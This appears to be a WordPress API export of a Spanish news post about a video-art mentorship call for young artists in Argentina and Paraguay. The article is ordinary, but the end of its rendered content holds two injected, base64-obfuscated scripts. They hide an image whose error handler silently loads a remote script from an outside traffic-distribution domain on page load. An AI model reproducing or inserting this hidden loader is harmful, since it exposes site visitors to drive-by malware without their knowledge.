{"id":3788,"date":"2024-03-01T11:06:27","date_gmt":"2024-03-01T14:06:27","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3788"},"modified":"2025-08-13T23:59:31","modified_gmt":"2025-08-14T02:59:31","slug":"convocan-a-videoartistas-a-un-programa-para-jovenes-de-argentina-y-paraguay","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3788","title":{"rendered":"Convocan a videoartistas a un programa para j\u00f3venes de Argentina y Paraguay"},"content":{"rendered":"\n<p class=\"has-text-align-right\"><em><sup>POR MERCEDES EZQUIAGA<\/sup><\/em><\/p>\n\n\n\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-52bd4879ab0ac5627b008b8f3479dd31\" style=\"background-color:#b11a40\"><em>\u00ab\u00bfC\u00f3mo queremos vivir juntxs?\u00bb, una iniciativa impulsada por el Goethe-Institut, la Alianza Francesa y Fundaci\u00f3n Medif\u00e9, tiene como objetivo desarrollar obras de video in\u00e9ditas, que a su vez, formar\u00e1n parte de una exposici\u00f3n itinerante a partir de noviembre de este a\u00f1o.<\/em><\/h4>\n\n\n\n<p>El programa de formaci\u00f3n \u00ab\u00bfC\u00f3mo queremos vivir juntxs?\u00bb, una iniciativa impulsada por el Goethe-Institut, la Alianza Francesa y Fundaci\u00f3n Medif\u00e9, que busca poner en valor el di\u00e1logo y la reflexi\u00f3n entre videoartistas, present\u00f3 este mi\u00e9rcoles la convocatoria a tutor\u00edas, dirigida a j\u00f3venes artistas residentes en la Argentina y Paraguay, con el objetivo de que puedan desarrollar obras de video in\u00e9ditas, que a su vez formar\u00e1n parte de una exposici\u00f3n itinerante a partir de noviembre de este a\u00f1o.<\/p>\n\n\n\n<p>\u00ab<strong>Este es un espacio de libertad y de inclusi\u00f3n. No somos una dependencia del gobierno y podemos seguir tomando posici\u00f3n frente a algunos temas.&nbsp;<\/strong>Mantenemos la premisa de vivir con otros que vienen con otras caracter\u00edsticas y no podemos dejar a nadie afuera. Por eso estamos lanzando esta convocatoria a nivel regional abocada al videoarte, que es un lenguaje complejo y actual, din\u00e1mico y polis\u00e9mico\u00bb, dijo este mi\u00e9rcoles en la sede de Fundaci\u00f3n Medif\u00e9, la&nbsp;<strong>gerente del espacio, Daniela Guti\u00e9rrez<\/strong>, durante la presentaci\u00f3n a la prensa.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65e0de575bdd4_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Foto: Gentileza Federico Larragueta.<\/figcaption><\/figure>\n\n\n\n<p>La iniciativa -cuya&nbsp;<strong>convocatoria permanecer\u00e1 abierta hasta el 13 de marzo<\/strong>&#8211; propone un programa intensivo de tutor\u00edas dirigido a j\u00f3venes artistas residentes en Argentina y Paraguay, con el objetivo de que puedan desarrollar obras de video in\u00e9ditas, al mismo tiempo que interact\u00faen y comparten entre pares sus perspectivas tanto espec\u00edficas del quehacer art\u00edstico como tambi\u00e9n del mundo y la situaci\u00f3n que les toca vivir.<\/p>\n\n\n\n<p>La idea es congregar a artistas de la disciplina del video, que presenten una idea de obra a desarrollar que comulgue con el t\u00edtulo del programa \u00ab\u00bfC\u00f3mo queremos vivir juntxs?\u00bb: \u00abEmpezamos a hacernos esta pregunta despu\u00e9s de la pandemia y sabemos que los artistas suelen captar con agudeza estas transformaciones sociales. Queremos desarrollarla juntos, &#8216;juntes&#8217;, porque es una pregunta que tiene que ser para todo el mundo y quisimos que eso se reflejara en el t\u00edtulo. Es obvio que la lengua cambia permanentemente y no hablamos ahora igual que hace cien a\u00f1os\u00bb, dijo por su parte&nbsp;<strong>Friso Maecker, director del Goethe-Institut de Buenos Aires.<\/strong><\/p>\n\n\n\n<p>Impulsada por tres instituciones culturales de pa\u00edses diversos, la iniciativa propone que haya una representaci\u00f3n de todas las regiones de Argentina, con tutor\u00edas a cargo de artistas profesionales con vasta trayectoria y prestigio internacional en el \u00e1mbito del videoarte, quienes brindar\u00e1n herramientas audiovisuales para abordar las cuestiones relevantes de la \u00e9poca a los j\u00f3venes artistas, respetando siempre una paridad de g\u00e9nero.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.instagram.com\/p\/C35aglZOnJO\/?utm_source=ig_embed&amp;utm_campaign=loading\">\u00bfC\u00f3mo queremos vivir juntxs? es un proyecto de @alianzafrancesabsas, @GoetheInstitutbsas con apoyo de @FundacionMedife y el Fondo Cultural\u2026 | Instagram<\/a><\/p>\n\n\n\n<p>\u00abCreo que hace 120 a\u00f1os que en la Alianza Francesa nos hacemos esta misma pregunta, extendida a las 53 sedes que tenemos en toda la Argentina, donde en noviembre pasado abrimos en la ciudad de C\u00f3rdoba el Instituto Cultural Franco-Alem\u00e1n\u00bb, retom\u00f3 por su parte Pascal Casanova, director general de la Alianza Francesa de Buenos Aires y coordinador de las Alianzas Francesas de Argentina.<\/p>\n\n\n\n<p>Celebr\u00f3 as\u00ed \u00abla cooperaci\u00f3n con nuestros colegas del Goethe-Institut en este nuevo gran proyecto de mentor\u00edas que beneficiar\u00e1 a videoartistas de todo el pa\u00eds y que refleja los valores de ambas instituciones en sus misiones como actores en el desarrollo de intercambios interculturales\u00bb.<\/p>\n\n\n\n<p>Un&nbsp;<strong>jurado&nbsp;<\/strong>conformado por la pionera en videoarte de Argentina&nbsp;<strong>Graciela Taquini<\/strong>, el cr\u00edtico&nbsp;<strong>Fernando Moure<\/strong>&nbsp;y los tutores&nbsp;<strong>Enrique Ram\u00edrez, Ariel Nah\u00f3n y Regina de Miguel<\/strong>&nbsp;seleccionar\u00e1 a 21 participantes para que formen parte de este programa.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>La convocatoria est\u00e1 abierta hasta el 13 de marzo y se seleccionar\u00e1n a 21 participantes.<\/p>\n<\/blockquote>\n\n\n\n<p>\u00abEl audiovisual es experimental, el videoarte es flexible, hay m\u00faltiples posibilidades. No s\u00e9 con qu\u00e9 proyectos nos vamos a encontrar pero ojal\u00e1 se multipliquen los ejemplos de no odio, de comprensi\u00f3n, de sentido, de afecto. En estos momentos tan oscuros que vivimos, los artistas pueden demostrar que se puede vivir de otros modos\u00bb, a\u00f1adi\u00f3 por su parte Graciela Taquini, al ser consultada por T\u00e9lam por los l\u00edmites de la disciplina art\u00edstica que rige la convocatoria.<\/p>\n\n\n\n<p>El programa consta de una<strong>&nbsp;primera etapa formativa en modo virtual de tres semanas<\/strong>, que se desarrollar\u00e1 en&nbsp;<strong>junio de 2024<\/strong>. Cada semana, un tutor diferente tendr\u00e1 a cargo las nueve horas semanales de trabajo. La segunda etapa abarca el desarrollo de una obra in\u00e9dita individual o colectiva durante tres meses, con dos instancias de retroalimentaci\u00f3n de uno de los tutores.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65e0de57314f0_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Foto: Gentileza Federico Larragueta.<\/figcaption><\/figure>\n\n\n\n<p>Durante el mes de&nbsp;<strong>noviembre&nbsp;<\/strong>se llevar\u00e1 a cabo la tercera y \u00faltima etapa, durante la cual habr\u00e1 un&nbsp;<strong>encuentro presencial de cuatro d\u00edas entre participantes y tutores<\/strong>&nbsp;en la ciudad de Buenos Aires, que culminar\u00e1 con la&nbsp;<strong>apertura de una muestra colectiva<\/strong>, en la sede de la Avenida C\u00f3rdoba 946 de la Alianza Francesa de Buenos Aires, abierta al p\u00fablico general.<\/p>\n\n\n\n<p>A partir de la inauguraci\u00f3n, se ofrecer\u00e1 la posibilidad de itinerancia de la muestra a los espacios de las instituciones franco-argentinas y germano-argentinas en el pa\u00eds.<\/p>\n\n\n\n<p>El programa otorgar\u00e1 a los participantes seleccionados un pasaje ida y vuelta por v\u00eda terrestre a la ciudad de Buenos Aires, cuatro noches de alojamiento (a excepci\u00f3n de quienes residan en AMBA) y un estipendio diario de 25.000 pesos para participar del encuentro presencial y de la apertura de la muestra.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>La muestra colectiva ser\u00e1 en noviembre en la sede de la Alianza Francesa de Buenos Aires.<\/p>\n<\/blockquote>\n\n\n\n<p>La convocatoria permanecer\u00e1 abierta del 28 de febrero al 13 de marzo de 2024 y las personas interesadas pueden postularse \u00fanicamente a trav\u00e9s de las p\u00e1ginas web del&nbsp;<a href=\"http:\/\/www.goethe.de\/buenosaires\" target=\"_blank\" rel=\"noreferrer noopener\">Goethe-Institut<\/a>,&nbsp;<a href=\"http:\/\/www.alianzafrancesa.org.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Alianza Francesa<\/a>&nbsp;y&nbsp;<a href=\"http:\/\/www.fundacionmedife.com.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Fundaci\u00f3n Medif\u00e9<\/a>.<\/p>\n\n\n\n<p>La llamada est\u00e1 dirigida a videoartistas tanto de Argentina como Paraguay con trayectoria inicial que producen obra contempor\u00e1nea. Podr\u00e1n postularse argentinos, paraguayos o extranjeros residentes en alguno de ambos pa\u00edses a la fecha de la convocatoria, cuyas indagaciones art\u00edsticas y obras exploren aspectos vinculados a la pregunta \u00ab\u00bfC\u00f3mo queremos vivir juntxs?\u00bb. \u00abLa idea es correrse de la l\u00f3gica de la metr\u00f3poli, que haya representatividad de todo el territorio y que se conforme una red creativa\u00bb, se\u00f1al\u00f3 por su parte Yael Tujsnaider,&nbsp; curadora de la programaci\u00f3n cultural del Goethe-Institut<\/p>\n\n\n\n<p>Los nombres de los seleccionados ser\u00e1n informados el 17 de abril de 2024 a trav\u00e9s de la direcci\u00f3n de e-mail que registraron en su inscripci\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/656617-video-artistas-convocatoria.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>POR MERCEDES EZQUIAGA \u00ab\u00bfC\u00f3mo queremos vivir juntxs?\u00bb, una iniciativa impulsada por el Goethe-Institut, la Alianza Francesa y Fundaci\u00f3n Medif\u00e9, tiene como objetivo desarrollar obras de video in\u00e9ditas, que a su vez, formar\u00e1n parte de una exposici\u00f3n itinerante a partir de noviembre de este a\u00f1o. El programa de formaci\u00f3n \u00ab\u00bfC\u00f3mo queremos vivir juntxs?\u00bb, una iniciativa impulsada [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3789,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[23,11],"tags":[],"class_list":{"0":"post-3788","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-audio-visuales","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3788"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3788"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3788\/revisions"}],"predecessor-version":[{"id":6837,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3788\/revisions\/6837"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3789"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3788"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3788"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3788"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}